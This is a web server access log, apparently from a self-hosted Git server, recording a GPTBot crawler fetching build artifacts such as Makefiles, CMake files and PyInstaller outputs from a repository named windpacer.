"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 31658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:15:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 26684] [Gzip 20.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:15:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 33397] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:15:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:15:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 78610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:15:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:15:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 40929] [Gzip 14.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:15:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:15:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:15:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 53422] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:15:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 28010] [Gzip 20.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:15:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9887] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:15:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16923] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:15:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 9880] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:15:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 78610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:15:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 9879] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:15:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 53389] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:15:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:15:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10774] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:15:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21644] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:15:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10375] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:15:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 10903] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:15:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 40461] [Gzip 14.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:15:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51201] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11823] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11267] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11188] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29808] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 